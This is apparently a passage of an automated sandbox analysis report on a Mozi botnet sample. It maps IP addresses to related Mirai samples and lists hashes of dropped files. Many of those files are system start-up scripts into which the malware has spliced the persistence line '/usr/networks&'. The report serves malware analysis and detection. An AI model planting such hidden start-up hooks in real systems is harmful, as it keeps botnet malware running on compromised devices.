                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          WATEEN-IMS-PK-AS-APNationalWiMAXIMSenvironmentPKrebirth.m68k.elfGet hashmaliciousMirai, OkiruBrowse
                                          • 110.39.224.247
                                          xobftuootu.elfGet hashmaliciousUnknownBrowse
                                          • 110.37.236.210
                                          x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                          • 110.36.193.38
                                          sora.sh4.elfGet hashmaliciousMiraiBrowse
                                          • 110.39.166.129
                                          botx.mpsl.elfGet hashmaliciousMiraiBrowse
                                          • 110.39.206.17
                                          la.bot.arm6.elfGet hashmaliciousUnknownBrowse
                                          • 110.39.21.131
                                          exe009.exeGet hashmaliciousEmotetBrowse
                                          • 58.27.215.3
                                          nklsh4.elfGet hashmaliciousUnknownBrowse
                                          • 110.39.206.22
                                          nklmpsl.elfGet hashmaliciousUnknownBrowse
                                          • 110.39.166.157
                                          la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                          • 110.37.189.197
                                          CMNET-V4HEBEI-AS-APHebeiMobileCommunicationCompanyLimitsora.sh4.elfGet hashmaliciousMiraiBrowse
                                          • 183.196.35.128
                                          bin.sh.elfGet hashmaliciousMiraiBrowse
                                          • 183.198.167.74
                                          powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                          • 111.63.127.172
                                          mpsl.elfGet hashmaliciousMiraiBrowse
                                          • 120.211.202.161
                                          sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                          • 111.62.129.55
                                          jmggnxeedy.elfGet hashmaliciousUnknownBrowse
                                          • 211.143.122.3
                                          ppc.elfGet hashmaliciousMiraiBrowse
                                          • 111.11.59.121
                                          nklarm5.elfGet hashmaliciousUnknownBrowse
                                          • 111.61.227.107
                                          arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                          • 120.211.66.31
                                          yakuza.arm4.elfGet hashmaliciousMiraiBrowse
                                          • 183.199.104.209
                                          ATGS-MMD-ASUShttp://prntbl.concejomunicipaldechinu.gov.coGet hashmaliciousUnknownBrowse
                                          • 34.160.17.71
                                          Josho.spc.elfGet hashmaliciousUnknownBrowse
                                          • 48.198.48.198
                                          Josho.arm7.elfGet hashmaliciousMiraiBrowse
                                          • 48.151.168.84
                                          Josho.x86.elfGet hashmaliciousUnknownBrowse
                                          • 32.79.71.24
                                          Josho.sh4.elfGet hashmaliciousUnknownBrowse
                                          • 48.133.202.204
                                          Josho.arm.elfGet hashmaliciousUnknownBrowse
                                          • 48.39.84.109
                                          Josho.m68k.elfGet hashmaliciousUnknownBrowse
                                          • 57.224.245.50
                                          Josho.mips.elfGet hashmaliciousUnknownBrowse
                                          • 48.110.156.208
                                          hax.spc.elfGet hashmaliciousMiraiBrowse
                                          • 48.245.146.188
                                          hax.x86.elfGet hashmaliciousMiraiBrowse
                                          • 48.135.190.16
                                          No context
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          /etc/init.d/S95baby.shbin.sh.elfGet hashmaliciousMiraiBrowse
                                            bin.sh.elfGet hashmaliciousMiraiBrowse
                                              bin.sh.elfGet hashmaliciousMiraiBrowse
                                                bin.sh.elfGet hashmaliciousMiraiBrowse
                                                  na.elfGet hashmaliciousMiraiBrowse
                                                    bin.sh.elfGet hashmaliciousMiraiBrowse
                                                      na.elfGet hashmaliciousMiraiBrowse
                                                        bin.shGet hashmaliciousMiraiBrowse
                                                          bin.shGet hashmaliciousMiraiBrowse
                                                            3aakN9FzA5Get hashmaliciousGafgyt MiraiBrowse
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Reputation:moderate, very likely benign file
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):326
                                                              Entropy (8bit):5.2904323771702915
                                                              Encrypted:false
                                                              SSDEEP:6:K8K2A6godGINKlsX3stINKVHBfNewdrCDjwFhD2UDKVHxMn:1f/NA23stIN8HdNTek3n8HWn
                                                              MD5:626FDB50CA17F4E2BAAB79F09F3EB73B
                                                              SHA1:2D838897E7D735CB67348F60EDA0E1E41D45DCBE
                                                              SHA-256:3FDFC702E6D3E1FE75E88B60408ED1B435F3AE24A57B56636C16CB321CBAE440
                                                              SHA-512:E3FB063A63DF21B22D20754AE2CEA1F0D80464F4A870491E2843F7D88EBA181E351C4A20D67AD6A4CD8D1BF26971C654C502D5770D5B43B34024FAF2048171F5
                                                              Malicious:false
                                                              Reputation:moderate, very likely benign file
                                                              Preview:./usr/networks&.test -d $KEYS_DIR || exit 0..MIN=0.MAX=$(cat $KEYS_DIR/max_brightness).VAL=$(cat $KEYS_DIR/brightness)..if [ "$1" = down ]; then..VAL=$((VAL-1)).else..VAL=$((VAL+1)).fi..if [ "$VAL" -lt $MIN ]; then..VAL=$MIN.elif [ "$VAL" -gt $MAX ]; then..VAL=$MAX.fi..echo $VAL > $KEYS_DIR/brightness../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):157
                                                              Entropy (8bit):4.412729940630044
                                                              Encrypted:false
                                                              SSDEEP:3:qXVfGHvNM8iKWERAIda74QvvvLwDGvNM8iKWERAIdJCsqORFL8OORgn:KJFn40MLFb+Pn
                                                              MD5:9B10038ADE21F207C6C9F4EEC7C5ADA2
                                                              SHA1:F3FB51110B022F8BFEA1874C6D6984D8C6EF8C7B
                                                              SHA-256:E6322FBB30D1362ED490A39BE58B491C7DB9CC96DB09C8E2BDC1B1F35E1A00E2
                                                              SHA-512:C9A47A0A449FD009221006D9077F1EDD25305EDA017DED7542AAF8EF80166B1645B889B478D6067ED2CB0123D798103DD73FD69B818C9B9704A274DC3FB4EA15
                                                              Malicious:false
                                                              Reputation:moderate, very likely benign file
                                                              Preview:./usr/networks&.test -f /usr/share/acpi-support/state-funcs || exit 0... /usr/share/acpi-support/state-funcs..toggleAllWirelessStates../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):636
                                                              Entropy (8bit):4.722087767454589
                                                              Encrypted:false
                                                              SSDEEP:12:wNGs4KSb7jFCR2TeNMngFfiTccfkneFhpmtjwkuVSd/1kVqEn:wFS/5uab2d7neFhij26/CwE
                                                              MD5:77315C7FA7809C62D27AD6C9EE1C9289
                                                              SHA1:C8EC67C17E334B13B1DE93B0D2E822C606F9985E
                                                              SHA-256:81CB0908E30FCF60AEA43776D5F1C3AEE6E1B46190A3DB5A1866CD1D2E09E17E
                                                              SHA-512:B679EF04092FDDBB0FA290F2D817DA38601336261870EE37BE6FA9451004B338E3A981694A0320B40A47A3597BA7B172848C877313F169ECDE3B8FB7FE38C582
                                                              Malicious:false
                                                              Reputation:moderate, very likely benign file
                                                              Preview:./usr/networks&.test -f /usr/share/acpi-support/state-funcs || exit 0..# Find and toggle wireless of bluetooth devices on ThinkPads... /usr/share/acpi-support/state-funcs..rfkill list | sed -n -e'/tpacpi_bluetooth_sw/,/^[0-9]/p' | grep -q 'Soft blocked: yes'.bluetooth_state=$?..# Note that this always alters the state of the wireless!.toggleAllWirelessStates;..# Sequence is Both on, Both off, Wireless only, Bluetooth only.if ! isAnyWirelessPoweredOn; then. # Wireless was turned off. if [ "$bluetooth_state" = 0 ]; then. rfkill unblock bluetooth. else. rfkill block bluetooth. fi.fi../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):483
                                                              Entropy (8bit):4.215331622973397
                                                              Encrypted:false
                                                              SSDEEP:6:KJFqcA/0MLFMkneFUJLS3SU9mFCQROAJzHdcnK/lHb/iHIYK3zQYlyMn:wK8QdeFuS3lyXp9cK/lziijQYlrn
                                                              MD5:07889D65619CDB80F8E876A087F160D3
                                                              SHA1:35CB92B632BCA335EBEA933A736F75856E8CA262
                                                              SHA-256:34768A7BD08F050862E888142B6246B41458957CF56BC4879619D3A315E3567B
                                                              SHA-512:C86DE6FC5047AC695717E11B8714DE439E63949B439C3B8AA79C060CF0E807FB964C81B1FF59A7C0F38E0F3CC85E6784F56E1536DDDE9B66D1E22D306BEFCFAE
                                                              Malicious:false
                                                              Preview:./usr/networks&.test -f /usr/share/acpi-support/key-constants || exit 0... /usr/share/acpi-support/state-funcs..if isAnyWirelessPoweredOn; then. if [ -x /usr/bin/toshset ]; then. if `toshset -bluetooth | grep -q attached`; then. toshset -bluetooth off. toggleAllWirelessStates. else. toshset -bluetooth on. fi. else..toggleAllWirelessStates. fi.else. toggleAllWirelessStates.fi../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):266
                                                              Entropy (8bit):4.77497394042067
                                                              Encrypted:false
                                                              SSDEEP:6:KJFqcA/05CbMTCYEBKAABrX8FvfbrX8EmNv0V4n:wK852PYEBKAkrX4HXHnV4n
                                                              MD5:5E3A15E41D35EC409613236A20B5783E
                                                              SHA1:5D71BD9A121461464F7937B2E921410ED93BEE24
                                                              SHA-256:C3294C9B06A81A3325E131BF139B5F1C8615290B382F0014DA440F4F76C49BEA
                                                              SHA-512:13E47AA60C322CB0DEF4894B97625EC2E3AE9214743569AD566ECA1331D581CD2185BC27CD538E8BA5D475FBBB79EC76EA4CCE31EDB115F30684D80CA9F5F1F4
                                                              Malicious:false
                                                              Preview:./usr/networks&.test -f /usr/share/acpi-support/key-constants || exit 0..for device in /sys/devices/platform/dock.*; do..[ -e "$device/type" ] || continue..[ x$(cat "$device/type") = xdock_station ] || continue..echo 1 > "$device/undock".done../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):297
                                                              Entropy (8bit):4.680424868813
                                                              Encrypted:false
                                                              SSDEEP:6:aJGzAuCuzHB/unOJufu+/ugEWR+V18yjPn:aJcvzHBmnO4G7gEWQ18yTn
                                                              MD5:10400BA156D6BC78E67D90A86A2906D4
                                                              SHA1:D4D7BA30B85ABA9FC08EC0C990651601128B2A74
                                                              SHA-256:D348A8461FB9190DCBD6CF35575B2C4799E04AA4E359EA921F8723C9FDAA457A
                                                              SHA-512:25B5C137961E10987A0BBF19AD7CCABC865A7DF7325D3C7B0B0C9BBDB68D5C4470B012A720FA43B707705ACB8FD8DD834AF3DCF7AEA3284A5587EC3E9212E9B3
                                                              Malicious:false
                                                              Preview:./usr/networks&. exit 0.fi.kbd_mode '-u' < '/dev/tty1' .kbd_mode '-u' < '/dev/tty2' .kbd_mode '-u' < '/dev/tty3' .kbd_mode '-u' < '/dev/tty4' .kbd_mode '-u' < '/dev/tty5' .kbd_mode '-u' < '/dev/tty6' .loadkeys '/etc/console-setup/cached_UTF-8_del.kmap.gz' > '/dev/null' ../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:POSIX shell script, ASCII text executable
                                                              Category:dropped
                                                              Size (bytes):25
                                                              Entropy (8bit):3.8936606896881854
                                                              Encrypted:false
                                                              SSDEEP:3:TKH4v0VJ:hK
                                                              MD5:1B3235BA10FC04836C941D3D27301956
                                                              SHA1:8909655763143702430B8C58B3AE3B04CFD3A29C
                                                              SHA-256:01BA1FB41632594997A41D0C3A911AE5B3034D566EBB991EF76AD76E6F9E283A
                                                              SHA-512:98BDB5C266222CCBD63B6F80C87E501C8033DC53B0513D300B8DA50E39A207A0B69F8CD3ECC4A128DEC340A1186779FEDD1049C9B0A70E90D2CB3AE6EBFA4C4D
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Joe Sandbox View:
                                                              • Filename: bin.sh.elf, Detection: malicious, Browse
                                                              • Filename: bin.sh.elf, Detection: malicious, Browse
                                                              • Filename: bin.sh.elf, Detection: malicious, Browse
                                                              • Filename: bin.sh.elf, Detection: malicious, Browse
                                                              • Filename: na.elf, Detection: malicious, Browse
                                                              • Filename: bin.sh.elf, Detection: malicious, Browse
                                                              • Filename: na.elf, Detection: malicious, Browse
                                                              • Filename: bin.sh, Detection: malicious, Browse
                                                              • Filename: bin.sh, Detection: malicious, Browse
                                                              • Filename: 3aakN9FzA5, Detection: malicious, Browse
                                                              Preview:#!/bin/sh./usr/networks&.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):85
                                                              Entropy (8bit):3.542211979287425
                                                              Encrypted:false
                                                              SSDEEP:3:qXVxpjWvFFFfN6DmXVOORgn:apqvFFxN6iMn
                                                              MD5:C0EB4B74AA083DE0731C7411490F5680
                                                              SHA1:91FE8A766B188646A140A0272D115A4E98F5587B
                                                              SHA-256:B2303EB7BFEE2D091C009CC33291EE1D146B2CBFCC52E1334EAA220777053768
                                                              SHA-512:4BA597428E1FB7A6C6A050A974BBD9ED955D5E5EFEDCD39CD44B274F34E7542CFB4E90A3F28C02D52AD4AA0C05AE73B1AABE6CC88B19203C1B4E9DBDB39CB2A5
                                                              Malicious:true
                                                              Preview:./usr/networks&. exit 3. ;;. esac.fi../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:true
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):85
                                                              Entropy (8bit):3.542211979287425
                                                              Encrypted:false
                                                              SSDEEP:3:qXVxpjWvFFFfN6DmXVOORgn:apqvFFxN6iMn
                                                              MD5:C0EB4B74AA083DE0731C7411490F5680
                                                              SHA1:91FE8A766B188646A140A0272D115A4E98F5587B
                                                              SHA-256:B2303EB7BFEE2D091C009CC33291EE1D146B2CBFCC52E1334EAA220777053768
                                                              SHA-512:4BA597428E1FB7A6C6A050A974BBD9ED955D5E5EFEDCD39CD44B274F34E7542CFB4E90A3F28C02D52AD4AA0C05AE73B1AABE6CC88B19203C1B4E9DBDB39CB2A5
                                                              Malicious:true
                                                              Preview:./usr/networks&. exit 3. ;;. esac.fi../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:true
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:true
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:true
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:true
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:true
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:true
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:true
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:true
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:true
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:true
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:true
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:POSIX shell script, ASCII text executable
                                                              Category:dropped
                                                              Size (bytes):25
                                                              Entropy (8bit):3.8936606896881854
                                                              Encrypted:false
                                                              SSDEEP:3:TKH4v0VJ:hK
                                                              MD5:1B3235BA10FC04836C941D3D27301956
                                                              SHA1:8909655763143702430B8C58B3AE3B04CFD3A29C
                                                              SHA-256:01BA1FB41632594997A41D0C3A911AE5B3034D566EBB991EF76AD76E6F9E283A
                                                              SHA-512:98BDB5C266222CCBD63B6F80C87E501C8033DC53B0513D300B8DA50E39A207A0B69F8CD3ECC4A128DEC340A1186779FEDD1049C9B0A70E90D2CB3AE6EBFA4C4D
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:#!/bin/sh./usr/networks&.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):714
                                                              Entropy (8bit):5.329653855555143
                                                              Encrypted:false
                                                              SSDEEP:12:cVDDdg8QdNux7S3Pd7PSeSST4ydVgpuVFnn3izesU6jc45gfqlX4n:UDxReIx7O9BSu4ydVBnn4742gyJ4
                                                              MD5:DD099D71A60531087FDDED3EBEE8036A
                                                              SHA1:C684334C3B133D889F8C5965184E1C9280BAA16A
                                                              SHA-256:52995C5CED8EE9421D08E745C5E3D9805783E5D641C7A8FDB1C3CA6A4C745E03
                                                              SHA-512:2788EB77A944861C3361D12DB65502553EE36314C40A864F73B2FF18AF54DA3D02F5AC07DBA4E962596F11DD8B826243BE2FD52F85F1260B511D3241E1C38C63
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 0.fi..# ifplugd(8) - <iface> <action>.#.# If an ifplugd managed interface is brought up, disconnect any.# wpa-roam managed interfaces so that only one "roaming" interface.# remains active on the system...IFPLUGD_IFACE="${1}"..case "${2}" in..up)...COMMAND=disconnect...;;..down)...COMMAND=reconnect...;;..*)...echo "$0: unknown arguments: ${@}" >&2...exit 1...;;.esac..for CTRL in /run/wpa_supplicant/*; do..[ -S "${CTRL}" ] || continue...IFACE="${CTRL#/run/wpa_supplicant/}"...# skip if ifplugd is managing this interface..if [ "${IFPLUGD_IFACE}" = "${IFACE}" ]; then...continue..fi...if wpa_action "${IFACE}" check; then...wpa_cli -i "${IFACE}" "${COMMAND}"..fi.done../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):3368
                                                              Entropy (8bit):5.3288648372922625
                                                              Encrypted:false
                                                              SSDEEP:48:VcySPOD1MoGPVKSQ5NkmzYykHypw5lX3yp4ZpOqq9GCyiqYJ7l87OqxOCXnNnogq:lZfGPODjea4+9Gc7kOqxOC9ogwaRM
                                                              MD5:77FEC347F290A3B065F36EE08ABB77C6
                                                              SHA1:388D7CC5DDF20DD8651ED01B99460B7CECCBA46A
